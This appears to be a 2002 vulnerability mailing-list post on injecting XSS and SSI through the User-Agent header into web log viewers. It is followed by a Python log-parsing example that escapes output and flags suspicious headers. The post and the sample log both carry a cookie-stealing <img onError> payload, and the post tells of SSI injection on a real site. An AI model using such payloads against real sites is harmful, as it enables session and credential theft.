Vulnerability Development mailing list archives

Re: XSS And Headers...


From: zeno <bugtraq () cgisecurity net>
Date: Sat, 25 May 2002 16:21:50 -0400 (EDT)

Normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)

but with a proxy prog (I use Proxomitron) you can change it to whatever you like...

for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';">

and if the site logs it, you just got the administrator's password :)

Now, I'm yet to come across any sites that this works on because I just thought of it this afternoon, but let me know if it works :) In any case, a lot of sites would log/store this kind of information so it should be fixed.



A hole in Analog and W3perl suffered from this problem. I'm sure other software does.

I have personally found an example of SSI tag insertion using this method on 1 website running "product unknown". I inserted SSI into the User-Agent field and visited the site, which displayed the logs in an SSI page. It executed the SSI tag which I inserted.

I just wrote a paper on cookie theft with xss
that may be worth a peek to you.

www.cgisecurity.com/articles/xss-faq.shtml

Also see
http://www.cgisecurity.net/papers/header-based-exploitation.txt

- zeno () cgisecurity com
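The defensive side of what the thread describes, as an added example (this code is not from the thread, from Analog, or from W3perl): a small log-viewer routine that parses Apache "combined"-style lines, where the User-Agent is the last quoted field, and shows the 2002-era bug (raw header text concatenated into HTML) next to the fix (HTML-escaping every untrusted field, quotes included), plus a simple detection heuristic that flags logged User-Agents containing markup or event handlers. The log lines are constructed for this example; the third carries the `<img onError>` payload from the thread and the fourth a benign SSI directive, the second case zeno mentions.

```python
import html
import re

# Constructed sample log (not from the thread): Apache "combined" style, with
# the User-Agent as the last quoted field. Lines 3 and 4 show a logged
# User-Agent carrying HTML and an SSI directive respectively.
SAMPLE_LOG = """\
203.0.113.5 - - [25/May/2002:16:21:50 -0400] "GET / HTTP/1.0" 200 1234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
203.0.113.6 - - [25/May/2002:16:22:01 -0400] "GET /about HTTP/1.0" 200 512 "-" "Lynx/2.8.4rel.1"
203.0.113.7 - - [25/May/2002:16:23:10 -0400] "GET / HTTP/1.0" 200 1234 "-" "<img src="x.jpg" onError="this.src='steal.cgi?document.cookie';">"
203.0.113.8 - - [25/May/2002:16:24:42 -0400] "GET / HTTP/1.0" 200 1234 "-" "<!--#echo var="DATE_LOCAL" -->"
"""

# ip ident user [time] "request" status size "referer" "user-agent"
# The final group is greedy so a User-Agent containing quotes is kept whole.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "(.*)"$'
)

# Heuristic for a User-Agent that looks like injected markup: a tag or
# comment opener, an on* event handler, or a javascript: URL.
SUSPICIOUS_RE = re.compile(r"<[!/a-zA-Z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def parse_log_line(line):
    """Split one combined-format line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, size, referer, ua = m.groups()
    return {"ip": ip, "time": ts, "request": request, "status": int(status),
            "size": size, "referer": referer, "user_agent": ua}


def is_suspicious_user_agent(ua):
    """Detection: does this logged User-Agent contain markup or script?"""
    return SUSPICIOUS_RE.search(ua) is not None


def render_row_unsafe(rec):
    """The bug the thread describes: header values pasted straight into HTML,
    so a logged <img onError=...> runs in the admin's browser."""
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        rec["ip"], rec["request"], rec["user_agent"])


def render_row_safe(rec):
    """The fix: escape every untrusted field (quotes too) so it renders as text."""
    cells = tuple(html.escape(rec[k], quote=True)
                  for k in ("ip", "request", "user_agent"))
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % cells


def build_report(log_text):
    """Return (escaped HTML table, list of records with a suspicious User-Agent)."""
    rows, flagged = [], []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than guess at fields
        if is_suspicious_user_agent(rec["user_agent"]):
            flagged.append(rec)
        rows.append(render_row_safe(rec))
    return "<table>\n" + "\n".join(rows) + "\n</table>", flagged


if __name__ == "__main__":
    table, flagged = build_report(SAMPLE_LOG)
    print(table)
    for rec in flagged:
        print("suspicious User-Agent from %s: %s" % (rec["ip"], rec["user_agent"]))
```

The same escaping neutralises the SSI case too, since an SSI directive is an HTML comment and the `<` is escaped before the page is served; the detection heuristic is a triage aid for the log reviewer, not a substitute for escaping the output.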



